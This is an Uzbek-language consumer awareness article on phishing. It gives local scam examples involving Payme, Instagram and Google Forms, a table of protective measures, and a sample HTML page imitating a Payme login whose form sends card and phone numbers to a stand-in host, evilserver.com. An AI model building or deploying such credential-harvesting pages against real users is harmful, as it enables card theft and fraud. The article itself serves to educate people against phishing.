Phishing nima? O‘zbek internet foydalanuvchilari eng ko‘p uchraydigan kiberfiribgarlik turi
«Karta bloklandi», «Instagram parolingiz buzilgan», «Siz yutdingiz!» – bu xabarlarga ishonmang! Phishing — bu firibgarlar sizni yolg‘on xabarlar bilan aldab, maxfiy ma’lumotlaringizni (karta raqami, SMS kod, parol, login) olish usuli. Bu nafaqat texnik, balki psixologik hujum hisoblanadi.
Phishing hujumlari odatda quyidagicha amalga oshiriladi:
-
Telegram/SMS orqali "Bankdan xabar" deb yuboriladi
-
E-mail orqali soxta "Instagram" yoki "Facebook" havolasi keladi
-
Soxta saytlarga kirishga undaydi:
payme-support.uz.to,uzcard-check.netlify.app
???? Mahalliy misollar
???? 1. Soxta “Payme” xabari:
"Karta hisobingiz bloklangan. Qayta faollashtirish uchun bu yerga kiring:
???? [payme-verify.uz.to]"
Sayt ochiladi, Payme saytiga juda o‘xshaydi. Karta raqami va telefon raqami so‘raladi. Kiritganingizdan so‘ng esa, karta bo‘shab qoladi.
2. Instagram “Huquqbuzarlik” phishingi:
“Akkountingiz mualliflik huquqini buzdi. 24 soat ichida e’tiroz bildirmasangiz, o‘chiriladi.”
Linkni bosasiz — soxta Instagram login oynasi ochiladi. Kiritilgan login/parollar firibgarga yuboriladi.
3. Google Form orqali “Yutuq o‘yini”:
“50 ta odamga 500 ming so‘mdan sovg‘a berilmoqda. Ishtirok etish uchun quyidagi formani to‘ldiring.”
Formada karta raqami, ismingiz, tug‘ilgan sana, SMS kodi so‘raladi...
Oddiy phishing sahifa kodi (o‘rganish uchun)
Quyidagi kod educational purpose uchun, ya’ni firibgarlikni qanday qilinishini tushunish orqali himoyalanish maqsadida keltirilgan.
<!-- phishing.html -->
<!DOCTYPE html>
<html>
<head>
<title>Payme - Kirish</title>
</head>
<body style="font-family:sans-serif; text-align:center; margin-top:100px;">
<h2>Payme tizimiga kirish</h2>
<form action="https://evilserver.com/capture" method="POST">
<input type="text" name="card" placeholder="Karta raqami"><br><br>
<input type="text" name="phone" placeholder="Telefon raqami"><br><br>
<input type="submit" value="Kirish">
</form>
</body>
</html>
Firibgarlar bu kabi sahifani netlify, 000webhost, github pages kabi bepul hostingga joylab, Telegram orqali tarqatishadi.
Soxta domen nomlari: payme-support.uz.to, uzcard-login.github.io va hokazo.
???? O‘zbek foydalanuvchisi uchun phishingdan himoyalanish yo‘llari
| Choralar | Tavsif |
|---|---|
| 1. Domenni tekshiring | Rasmiy sayt: payme.uz, Firibgar: payme-verify.uz.to |
| 2. Hech qachon SMS kodni bermang | Bank, Payme, Click sizdan hech qachon SMS kod so‘ramaydi |
| 3. 2 bosqichli himoyani yoqing | Instagram, Telegram, Gmail’da 2FA ni yoqish majburiy! |
| 4. Rasmiy ilovalargina ishonchli | Hech qachon linkdan ilova yuklab olmang |
| 5. Antivirus va brauzer plaginlar | Netcraft, uBlock Origin phishingni aniqlay oladi |
Sizning reaksiyangiz qanday?
